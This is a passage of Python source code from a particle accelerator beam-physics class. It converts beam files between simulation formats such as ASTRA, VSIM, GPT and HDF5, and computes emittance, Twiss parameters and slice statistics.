self.beam['clock'][0] = data[0, 0] * 1e-9
self.beam['index'] = np.full(len(self.x), 5)
self.beam['status'] = np.full(len(self.x), 1)
self.beam['t'] = self.z / (-1 * self.Bz * constants.speed_of_light)# [time if status is -1 else 0 for time, status in zip(clock, self.beam['status'])]
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_vsim_h5_beam_file(self, filename, charge=70e-12, interval=1):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
data = np.array(h5file.get('/BeamElectrons'))[1:-1:interval]
z, y, x, cpz, cpy, cpx = data.transpose()
self.beam['code'] = "VSIM"
self.beam['longitudinal_reference'] = 'z'
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.particle_mass
self.beam['py'] = cpy * self.particle_mass
self.beam['pz'] = cpz * self.particle_mass
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def read_pacey_beam_file(self, file, charge=250e-12):
self.reset_dicts()
data = self.read_csv_file(file, delimiter='\t')
self.beam['code'] = "TPaceyASTRA"
self.beam['longitudinal_reference'] = 'z'
x, y, z, cpx, cpy, cpz = np.transpose(data)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
# self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
self.beam['total_charge'] = charge
self.beam['charge'] = []
def convert_csrtrackfile_to_astrafile(self, csrtrackfile, astrafile):
data = self.read_csv_file(csrtrackfile)
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
charge = -charge*1e9
clock0 = (data[0, 0] / constants.speed_of_light) * 1e9
clock = np.full(len(x), 0)
clock[0] = clock0
index = np.full(len(x), 1)
status = np.full(len(x), 5)
array = np.array([x, y, z, cpx, cpy, cpz, clock, charge, index, status]).transpose()
self.write_csv_file(astrafile, array)
def find_nearest_vector(self, nodes, node):
return cdist([node], nodes).argmin()
def rms(self, x, axis=None):
return np.sqrt(np.mean(x**2, axis=axis))
def create_ref_particle(self, array, index=0, subtractmean=False):
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - np.mean(array)
return array
def write_astra_beam_file(self, file, index=1, status=5, charge=None, normaliseZ=False):
if not isinstance(index,(list, tuple, np.ndarray)):
if len(self.beam['charge']) == len(self.x):
chargevector = 1e9*self.beam['charge']
else:
chargevector = np.full(len(self.x), 1e9*self.charge/len(self.x))
if not isinstance(index,(list, tuple, np.ndarray)):
indexvector = np.full(len(self.x), index)
statusvector = self.beam['status'] if 'status' in self.beam else status if isinstance(status,(list, tuple, np.ndarray)) else np.full(len(self.x), status)
''' if a particle is emitting from the cathode it's z value is 0 and it's clock value is finite, otherwise z is finite and clock is irrelevant (thus zero) '''
if self.beam['longitudinal_reference'] == 't':
zvector = [0 if status == -1 and t == 0 else z for status, z, t in zip(statusvector, self.z, self.t)]
else:
zvector = self.z
''' if the clock value is finite, we calculate it from the z value, using Betaz '''
# clockvector = [1e9*z / (1 * Bz * constants.speed_of_light) if status == -1 and t == 0 else 1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
clockvector = [1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
''' this is the ASTRA array in all it's glory '''
array = np.array([self.x, self.y, zvector, self.cpx, self.cpy, self.cpz, clockvector, chargevector, indexvector, statusvector]).transpose()
if 'reference_particle' in self.beam:
ref_particle = self.beam['reference_particle']
# print 'we have a reference particle! ', ref_particle
# np.insert(array, 0, ref_particle, axis=0)
else:
''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
rms_vector = [a if abs(a) > 0 else 1 for a in self.rms(array, axis=0)]
''' normalise the array '''
norm_array = array / rms_vector
''' take the meen of the normalised array '''
mean_vector = np.mean(norm_array, axis=0)
''' find the index of the vector that is closest to the mean - if you read in an ASTRA file, this should actually return the reference particle! '''
nearest_idx = self.find_nearest_vector(norm_array, mean_vector);
ref_particle = array[nearest_idx]
''' set the closest mean vector to be in position 0 in the array '''
array = np.roll(array, -1*nearest_idx, axis=0)
''' normalise Z to the reference particle '''
array[1:,2] = array[1:,2] - ref_particle[2]
''' should we leave Z as the reference value, set it to 0, or set it to be some offset? '''
if not normaliseZ is False:
array[0,2] = 0
if not isinstance(normaliseZ,(bool)):
array[0,2] += normaliseZ
''' normalise pz and the clock '''
# print('Mean pz = ', np.mean(array[:,5]))
array[1:,5] = array[1:,5] - ref_particle[5]
array[0,6] = array[0,6] + ref_particle[6]
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%d','%d'))
def write_vsim_beam_file(self, file, normaliseT=False):
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.beam['total_charge']/len(self.x))
if normaliseT:
tvector = self.t - np.mean(self.t)
zvector = self.z - np.mean(self.z)
else:
tvector = self.t
zvector = self.z
zvector = [t * (1 * Bz * constants.speed_of_light) if z == 0 else z for z, t, Bz in zip(zvector, tvector, self.Bz)]
''' this is the VSIM array in all it's glory '''
array = np.array([zvector, self.y, self.x, self.Bz*self.gamma*constants.speed_of_light, self.By*self.gamma*constants.speed_of_light, self.Bx*self.gamma*constants.speed_of_light]).transpose()
''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'))
def write_gdf_beam_file(self, filename, normaliseZ=False):
q = np.full(len(self.x), -1 * constants.elementary_charge)
m = np.full(len(self.x), constants.electron_mass)
nmacro = np.full(len(self.x), abs(self.beam['total_charge'] / constants.elementary_charge / len(self.x)))
toffset = np.mean(self.z / (self.Bz * constants.speed_of_light))
z = self.z if not normaliseZ else (self.z - np.mean(self.z))
dataarray = np.array([self.x, self.y, z, q, m, nmacro, self.gamma*self.Bx, self.gamma*self.By, self.gamma*self.Bz]).transpose()
namearray = 'x y z q m nmacro GBx GBy GBz'
np.savetxt(filename, dataarray, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'), header=namearray, comments='')
def read_gdf_beam_file_object(self, file):
if isinstance(file, (str)):
gdfbeam = rgf.read_gdf_file(file)
elif isinstance(file, (rgf.read_gdf_file)):
gdfbeam = file
else:
raise Exception('file is not str or gdf object!')
return gdfbeam
def calculate_gdf_s(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
datagrab = gdfbeam.get_grab(0)
avgt = [datagrab.avgt]
position = [datagrab.position]
sposition = list(zip(*list(sorted(zip(avgt[0], position[0])))))[1]
ssposition = list(zip(sposition, list(sposition[1:])+[0]))
offset = 0
spos = []
for p1,p2 in ssposition:
spos += [p1 + offset]
if p2 < p1:
offset += p1
return spos
def calculate_gdf_eta(self, file):
gdfbeam = self.read_gdf_beam_file_object(file)
etax = []
etaxp = []
tp = []
for p in gdfbeam.positions:
self.read_gdf_beam_file(gdfbeam=gdfbeam, position=p)
if len(self.x) > 0:
e, ep, t = self.calculate_etax()
etax += [e]
etaxp += [ep]
tp += [t]
etax, etaxp = list(zip(*list(sorted(zip(tp, etax, etaxp)))))[1:]
return etax, etaxp
def read_gdf_beam_file_info(self, file):
self.reset_dicts()
gdfbeamdata = None
gdfbeam = self.read_gdf_beam_file_object(file)
print('grab_groups = ', gdfbeam.grab_groups)
print(( 'Positions = ', gdfbeam.positions))
print(( 'Times = ', gdfbeam.times))
def read_gdf_beam_file(self, file=None, position=None, time=None, block=None, charge=None, longitudinal_reference='t', gdfbeam=None):
self.reset_dicts()
if gdfbeam is None and not file is None:
gdfbeam = self.read_gdf_beam_file_object(file)
elif gdfbeam is None and file is None:
return None
if position is not None:# and (time is not None or block is not None):
# print 'Assuming position over time!'
self.beam['longitudinal_reference'] = 't'
gdfbeamdata = gdfbeam.get_position(position)
if gdfbeamdata is not None:
# print('GDF found position ', position)
time = None
block = None
else:
print('GDF DID NOT find position ', position)
position = None
elif position is None and time is not None and block is not None:
# print 'Assuming time over block!'
self.beam['longitudinal_reference'] = 'p'
gdfbeamdata = gdfbeam.get_time(time)
if gdfbeamdata is not None:
block = None
else:
time = None
elif position is None and time is None and block is not None:
gdfbeamdata = gdfbeam.get_grab(block)
if gdfbeamdata is None:
block = None
elif position is None and time is None and block is None:
gdfbeamdata = gdfbeam.get_grab(0)
self.beam['code'] = "GPT"
self.beam['x'] = gdfbeamdata.x
self.beam['y'] = gdfbeamdata.y
if hasattr(gdfbeamdata,'z') and longitudinal_reference == 'z':
# print( 'z!')
# print(( gdfbeamdata.z))
self.beam['z'] = gdfbeamdata.z
self.beam['t'] = np.full(len(self.z), 0)# self.z / (-1 * self.Bz * constants.speed_of_light)
elif hasattr(gdfbeamdata,'t') and longitudinal_reference == 't':
# print( 't!')
self.beam['t'] = gdfbeamdata.t
self.beam['z'] = (-1 * gdfbeamdata.Bz * constants.speed_of_light) * (gdfbeamdata.t-np.mean(gdfbeamdata.t)) + gdfbeamdata.z
self.beam['gamma'] = gdfbeamdata.G
if hasattr(gdfbeamdata,'q') and hasattr(gdfbeamdata,'nmacro'):
self.beam['charge'] = gdfbeamdata.q * gdfbeamdata.nmacro
self.beam['total_charge'] = np.sum(self.beam['charge'])
else:
if charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
# print(( self.beam['charge']))
vx = gdfbeamdata.Bx * constants.speed_of_light
vy = gdfbeamdata.By * constants.speed_of_light
vz = gdfbeamdata.Bz * constants.speed_of_light
velocity_conversion = 1 / (constants.m_e * self.beam['gamma'])
self.beam['px'] = vx / velocity_conversion
self.beam['py'] = vy / velocity_conversion
self.beam['pz'] = vz / velocity_conversion
return gdfbeam
def rotate_beamXZ(self, theta, preOffset=[0,0,0], postOffset=[0,0,0]):
preOffset=np.array(preOffset)
postOffset=np.array(postOffset)
rotation_matrix = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-1*np.sin(theta), 0, np.cos(theta)]])
beam = np.array([self.x,self.y,self.z]).transpose()
self.beam['x'],self.beam['y'],self.beam['z'] = (np.dot(beam-preOffset, rotation_matrix)-postOffset).transpose()
beam = np.array([self.px, self.py, self.pz]).transpose()
self.beam['px'], self.beam['py'], self.beam['pz'] = np.dot(beam, rotation_matrix).transpose()
if 'reference_particle' in self.beam:
beam = np.array([self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2]])
self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2] = (np.dot([beam-preOffset], rotation_matrix)[0]-postOffset)
# print 'rotated ref part = ', np.dot([beam-preOffset], rotation_matrix)[0]
beam = np.array([self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5]])
self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5] = np.dot([beam], rotation_matrix)[0]
self.beam['rotation'] = theta
self.beam['offset'] = preOffset
def unrotate_beamXZ(self):
offset = self.beam['offset'] if 'offset' in self.beam else np.array([0,0,0])
if 'rotation' in self.beam or abs(self.beam['rotation']) > 0:
self.rotate_beamXZ(-1*self.beam['rotation'], -1*offset)
def write_HDF5_beam_file(self, filename, centered=False, mass=constants.m_e, sourcefilename=None, pos=None, rotation=None, longitudinal_reference='t', zoffset=0):
# print('zoffset = ', zoffset, type(zoffset))
if isinstance(zoffset,(list, np.ndarray)) and len(zoffset) == 3:
xoffset = zoffset[0]
yoffset = zoffset[1]
zoffset = zoffset[2]
else:
xoffset = 0
yoffset = 0
# print('xoffset = ', xoffset)
# print('yoffset = ', yoffset)
# print('zoffset = ', zoffset)
with h5py.File(filename, "w") as f:
inputgrp = f.create_group("Parameters")
if not 'total_charge' in self.beam or self.beam['total_charge'] == 0:
self.beam['total_charge'] = np.sum(self.beam['charge'])
if sourcefilename is not None:
inputgrp['Source'] = sourcefilename
if pos is not None:
inputgrp['Starting_Position'] = pos
else:
inputgrp['Starting_Position'] = [0, 0, 0]
if rotation is not None:
inputgrp['Rotation'] = rotation
else:
inputgrp['Rotation'] = 0
inputgrp['total_charge'] = self.beam['total_charge']
inputgrp['npart'] = len(self.x)
inputgrp['centered'] = centered
inputgrp['code'] = self.beam['code']
inputgrp['particle_mass'] = mass
beamgrp = f.create_group("beam")
if 'reference_particle' in self.beam:
beamgrp['reference_particle'] = self.beam['reference_particle']
if 'status' in self.beam:
beamgrp['status'] = self.beam['status']
beamgrp['longitudinal_reference'] = longitudinal_reference
if len(self.beam['charge']) == len(self.x):
chargevector = self.beam['charge']
else:
chargevector = np.full(len(self.x), self.charge/len(self.x))
array = np.array([self.x + xoffset, self.y + yoffset, self.z + zoffset, self.cpx, self.cpy, self.cpz, self.t, chargevector]).transpose()
beamgrp['columns'] = np.array(['x','y','z', 'cpx', 'cpy', 'cpz', 't', 'q'], dtype='S')
beamgrp['units'] = np.array(['m','m','m','eV','eV','eV','s','e'], dtype='S')
beamgrp.create_dataset("beam", data=array)
def read_HDF5_beam_file(self, filename, local=False):
self.reset_dicts()
with h5py.File(filename, "r") as h5file:
if h5file.get('beam/reference_particle') is not None:
self.beam['reference_particle'] = np.array(h5file.get('beam/reference_particle'))
if h5file.get('beam/longitudinal_reference') is not None:
self.beam['longitudinal_reference'] = np.array(h5file.get('beam/longitudinal_reference'))
else:
self.beam['longitudinal_reference'] = 't'
if h5file.get('beam/status') is not None:
self.beam['status'] = np.array(h5file.get('beam/status'))
x, y, z, cpx, cpy, cpz, t, charge = np.array(h5file.get('beam/beam')).transpose()
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
# self.beam['cpx'] = cpx
# self.beam['cpy'] = cpy
# self.beam['cpz'] = cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
# self.beam['cp'] = cp
# self.beam['p'] = cp * self.q_over_c
# self.beam['xp'] = np.arctan(self.px/self.pz)
# self.beam['yp'] = np.arctan(self.py/self.pz)
self.beam['clock'] = np.full(len(self.x), 0)
# self.beam['gamma'] = np.sqrt(1+(self.cp/self.E0_eV)**2)
# velocity_conversion = 1 / (constants.m_e * self.gamma)
# self.beam['vx'] = velocity_conversion * self.px
# self.beam['vy'] = velocity_conversion * self.py
# self.beam['vz'] = velocity_conversion * self.pz
# self.beam['Bx'] = self.vx / constants.speed_of_light
# self.beam['By'] = self.vy / constants.speed_of_light
# self.beam['Bz'] = self.vz / constants.speed_of_light
self.beam['t'] = t
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
startposition = np.array(h5file.get('/Parameters/Starting_Position'))
startposition = startposition if startposition is not None else [0,0,0]
self.beam['starting_position'] = startposition
theta = np.array(h5file.get('/Parameters/Rotation'))
theta = theta if theta is not None else 0
self.beam['rotation'] = theta
if local == True:
self.rotate_beamXZ(self.beam['rotation'], preOffset=self.beam['starting_position'])
''' ******************** Statistical Parameters ************************* '''
def kde_function(self, x, bandwidth=0.2, **kwargs):
"""Kernel Density Estimation with Scipy"""
# Note that scipy weights its bandwidth by the covariance of the
# input data. To make the results comparable to the other methods,
# we divide the bandwidth by the sample standard deviation here.
# Taken from https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
if not hasattr(self, '_kde_x') or not len(x) == len(self._kde_x) or not np.allclose(x, self._kde_x) or not bandwidth == self._kde_bandwidth:
self._kde_x = x
self._kde_bandwidth = bandwidth
self._kde_function = gaussian_kde(x, bw_method=bandwidth / x.std(ddof=1), **kwargs)
return self._kde_function
def PDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
return kde.evaluate(x_grid)
def PDFI(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
vals = kde.evaluate(x_grid)
f = lambda bin, val: self.charge / len(self.t) * (val / bin)
return vals#self.charge * vals / (2*abs(x_grid[1] - x_grid[0])) / len(self.t) #[f(x_grid[1] - x_grid[0], v) for v in vals]
def CDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
cdf = np.vectorize(lambda e: kde.integrate_box_1d(x_grid[0], e))
return cdf(x_grid)
def FWHM(self, X, Y, frac=0.5):
frac = 1.0/frac if frac > 1 else frac
d = Y - (max(Y) * frac)
indexes = np.where(d > 0)[0]
return abs(X[indexes][-1] - X[indexes][0]), indexes
def covariance(self, u, up):
u2 = u - np.mean(u)
up2 = up - np.mean(up)
return np.mean(u2*up2) - np.mean(u2)*np.mean(up2)
def emittance(self, x, xp, p=None):
cov_x = self.covariance(x, x)
cov_xp = self.covariance(xp, xp)
cov_x_xp = self.covariance(x, xp)
emittance = np.sqrt(cov_x * cov_xp - cov_x_xp**2) if (cov_x * cov_xp - cov_x_xp**2) > 0 else 0
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def volume(self):
return self.volume6D(self.x, self.y, self.z-np.mean(self.z), self.cpx/self.cpz, self.cpy/self.cpz, ((self.cpz/np.mean(self.cp)) - 1))
@property
def density(self):
return len(self.x) / self.volume
def volume6D(self, x, y, t, xp, yp, cp):
if len(x) < 10:
return 1e6
else:
beam = list(zip(x, y, t, xp, yp, cp))
return ConvexHull(beam, qhull_options='QJ').volume
def mve_emittance(self, x, xp, p=None):
(center, radii, rotation, hullP) = MVE.getMinVolEllipse(list(zip(x,xp)), .01)
emittance = radii[0] * radii[1]
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
@property
def normalized_horizontal_emittance(self):
return self.emittance(self.x, self.xp, self.cp)
@property
def normalized_vertical_emittance(self):
return self.emittance(self.y, self.yp, self.cp)
@property
def horizontal_emittance(self):
return self.emittance(self.x, self.xp)
@property
def vertical_emittance(self):
return self.emittance(self.y, self.yp)
@property
def normalized_mve_horizontal_emittance(self):
return self.mve_emittance(self.x, self.xp, self.cp)
@property
def normalized_mve_vertical_emittance(self):
return self.mve_emittance(self.y, self.yp, self.cp)
@property
def horizontal_mve_emittance(self):
return self.mve_emittance(self.x, self.xp)
@property
def vertical_mve_emittance(self):
return self.mve_emittance(self.y, self.yp)
@property
def horizontal_emittance_90(self):
emit = self.horizontal_emittance
alpha = self.alpha_x
beta = self.beta_x
gamma = self.gamma_x
emiti = gamma * self.x**2 + 2 * alpha * self.x * self.xp + beta * self.xp * self.xp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_horizontal_emittance_90(self):
emit = self.horizontal_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def vertical_emittance_90(self):
emit = self.vertical_emittance
alpha = self.alpha_y
beta = self.beta_y
gamma = self.gamma_y
emiti = gamma * self.y**2 + 2 * alpha * self.y * self.yp + beta * self.yp * self.yp
return sorted(emiti)[int(0.9*len(emiti)-0.5)]
@property
def normalized_vertical_emittance_90(self):
emit = self.vertical_emittance_90
return np.mean(self.cp)/self.E0_eV * emit
@property
def beta_x(self):
self.twiss['beta_x'] = self.covariance(self.x,self.x) / self.horizontal_emittance
return self.twiss['beta_x']
@property
def alpha_x(self):
self.twiss['alpha_x'] = -1*self.covariance(self.x,self.xp) / self.horizontal_emittance
return self.twiss['alpha_x']
@property
def gamma_x(self):
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def beta_y(self):
self.twiss['beta_y'] = self.covariance(self.y,self.y) / self.vertical_emittance
return self.twiss['beta_y']
@property
def alpha_y(self):
self.twiss['alpha_y'] = -1*self.covariance(self.y,self.yp) / self.vertical_emittance
return self.twiss['alpha_y']
@property
def gamma_y(self):
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
@property
def twiss_analysis(self):
return self.horizontal_emittance, self.alpha_x, self.beta_x, self.gamma_x, self.vertical_emittance, self.alpha_y, self.beta_y, self.gamma_y
def eta_correlation(self, u):
return self.covariance(u,self.p) / self.covariance(self.p, self.p)
def eta_corrected(self, u):
return u - self.eta_correlation(u)*self.p
@property
def horizontal_emittance_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
return self.emittance(xc, xpc)
@property
def vertical_emittance_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
return self.emittance(yc, ypc)
@property
def beta_x_corrected(self):
xc = self.eta_corrected(self.x)
self.twiss['beta_x'] = self.covariance(xc, xc) / self.horizontal_emittance_corrected
return self.twiss['beta_x']
@property
def alpha_x_corrected(self):
xc = self.eta_corrected(self.x)
xpc = self.eta_corrected(self.xp)
self.twiss['alpha_x'] = -1*self.covariance(xc, xpc) / self.horizontal_emittance_corrected
return self.twiss['alpha_x']
@property
def gamma_x_corrected(self):
xpc = self.eta_corrected(self.xp)
self.twiss['gamma_x'] = self.covariance(xpc, xpc) / self.horizontal_emittance_corrected
return self.twiss['gamma_x']
@property
def beta_y_corrected(self):
yc = self.eta_corrected(self.y)
self.twiss['beta_y'] = self.covariance(yc,yc) / self.vertical_emittance_corrected
return self.twiss['beta_y']
@property
def alpha_y_corrected(self):
yc = self.eta_corrected(self.y)
ypc = self.eta_corrected(self.yp)
self.twiss['alpha_y'] = -1*self.covariance(yc, ypc) / self.vertical_emittance_corrected
return self.twiss['alpha_y']
@property
def gamma_y_corrected(self):
ypc = self.eta_corrected(self.yp)
self.twiss['gamma_y'] = self.covariance(ypc,ypc) / self.vertical_emittance_corrected
return self.twiss['gamma_y']
@property
def twiss_analysis_corrected(self):
return self.horizontal_emittance_corrected, self.alpha_x_corrected, self.beta_x_corrected, self.gamma_x_corrected, \
self.vertical_emittance_corrected, self.alpha_y_corrected, self.beta_y_corrected, self.gamma_y_corrected
@property
def slice_length(self):
return self._slicelength
@slice_length.setter
def slice_length(self, slicelength):
self._slicelength = slicelength
@property
def slices(self):
return self._slices
@slices.setter
def slices(self, slices):
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
if slices == 0:
slices = int(twidth / 0.1e-12)
self._slices = slices
self._slicelength = twidth / self._slices
def bin_time(self):
if not hasattr(self,'slice'):
self.slice = {}
if not hasattr(self,'_slicelength'):
self.slice_length = 0
# print("Assuming slice length is 100 fs")
twidth = (max(self.t) - min(self.t))
if twidth == 0:
t = self.z / (-1 * self.Bz * constants.speed_of_light)
twidth = (max(t) - min(t))
else:
t = self.t
if not self.slice_length > 0.0:
self.slice_length = twidth / 20.0
nbins = max([1,int(np.ceil(twidth / self.slice_length))])+2
self._hist, binst = np.histogram(t, bins=nbins, range=(min(t)-self.slice_length, max(t)+self.slice_length))
self.slice['t_Bins'] = binst
self._t_binned = np.digitize(t, self.slice['t_Bins'])
self._tfbins = [[self._t_binned == i] for i in range(1, len(binst))]
self._tbins = [np.array(self.t)[tuple(tbin)] for tbin in self._tfbins]
self._cpbins = [np.array(self.cp)[tuple(tbin)] for tbin in self._tfbins]
def bin_momentum(self, width=10**6):
if not hasattr(self,'slice'):
self.slice = {}
pwidth = (max(self.cp) - min(self.cp))
if width is None:
self.slice_length_cp = pwidth / self.slices
else:
self.slice_length_cp = width
nbins = max([1,int(np.ceil(pwidth / self.slice_length_cp))])+2
self._hist, binst = np.histogram(self.cp, bins=nbins, range=(min(self.cp)-self.slice_length_cp, max(self.cp)+self.slice_length_cp))
self.slice['cp_Bins'] = binst
self._cp_binned = np.digitize(self.cp, self.slice['cp_Bins'])
self._tfbins = [np.array([self._cp_binned == i]) for i in range(1, len(binst))]
self._cpbins = [self.cp[tuple(cpbin)] for cpbin in self._tfbins]
self._tbins = [self.t[tuple(cpbin)] for cpbin in self._tfbins]
@property
def slice_bins(self):
if not hasattr(self,'slice'):
self.bin_time()
bins = self.slice['t_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_cpbins(self):
if not hasattr(self,'slice'):
self.bin_momentum()
bins = self.slice['cp_Bins']
return (bins[:-1] + bins[1:]) / 2
# return [t.mean() for t in ]
@property
def slice_momentum(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum'] = np.array([cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins ])
return self.slice['Momentum']
@property
def slice_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Momentum_Spread'] = np.array([cpbin.std() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Momentum_Spread']
@property
def slice_relative_momentum_spread(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
self.slice['Relative_Momentum_Spread'] = np.array([100*cpbin.std()/cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
return self.slice['Relative_Momentum_Spread']
def slice_data(self, data):
return [data[tuple(tbin)] for tbin in self._tfbins]
def emitbins(self, x, y):
xbins = self.slice_data(x)
ybins = self.slice_data(y)
return list(zip(*[xbins, ybins, self._cpbins]))
@property
def slice_6D_Volume(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
ybins = self.slice_data(self.y)
zbins = self.slice_data(self.z-np.mean(self.z))
pxbins = self.slice_data(self.cpx/self.cpz)
pybins = self.slice_data(self.cpy/self.cpz)
pzbins = self.slice_data(((self.cpz/np.mean(self.cp)) - 1))
emitbins = list(zip(xbins, ybins, zbins, pxbins, pybins, pzbins))
self.slice['6D_Volume'] = np.array([self.volume6D(*a) for a in emitbins])
return self.slice['6D_Volume']
@property
def slice_density(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
xbins = self.slice_data(self.x)
volume = self.slice_6D_Volume
self.slice['Density'] = np.array([len(x)/v for x, v in zip(xbins, volume)])
return self.slice['Density']
@property
def slice_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Horizontal_Emittance']
@property
def slice_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Vertical_Emittance']
@property
def slice_normalized_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_Horizontal_Emittance']
@property
def slice_normalized_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_Vertical_Emittance']
@property
def slice_normalized_mve_horizontal_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.x, self.xp)
self.slice['Normalized_mve_Horizontal_Emittance'] = np.array([self.mve_emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
return self.slice['Normalized_mve_Horizontal_Emittance']
@property
def slice_normalized_mve_vertical_emittance(self):
if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
self.bin_time()
emitbins = self.emitbins(self.y, self.yp)
self.slice['Normalized_mve_Vertical_Emittance'] = np.array([self.mve_emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
return self.slice['Normalized_mve_Vertical_Emittance']
@property
def slice_peak_current(self):
if not hasattr(self,'_hist'):
self.bin_time()
f = lambda bin: self.charge / len(self.t) * (len(bin) / (max(bin) - min(bin))) if len(bin) > 1 else 0
# f = lambda bin: len(bin) if len(bin) > 1 else 0
self.slice['Peak_Current'] = np.array([f(bin) for bin in self._tbins])
return abs(self.slice['Peak_Current'])
@property
def slice_max_peak_current_slice(self):
peakI = self.slice_peak_current
self.slice['Max_Peak_Current_Slice'] = list(abs(peakI)).index(max(abs(peakI)))
return self.slice['Max_Peak_Current_Slice']
@property
def slice_beta_x(self):
xbins = self.slice_data(self.beam['x'])
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, exbins))
self.slice['slice_beta_x'] = np.array([self.covariance(x, x)/ex if ex > 0 else 0 for x, ex in emitbins])
return self.slice['slice_beta_x']
@property
def slice_alpha_x(self):
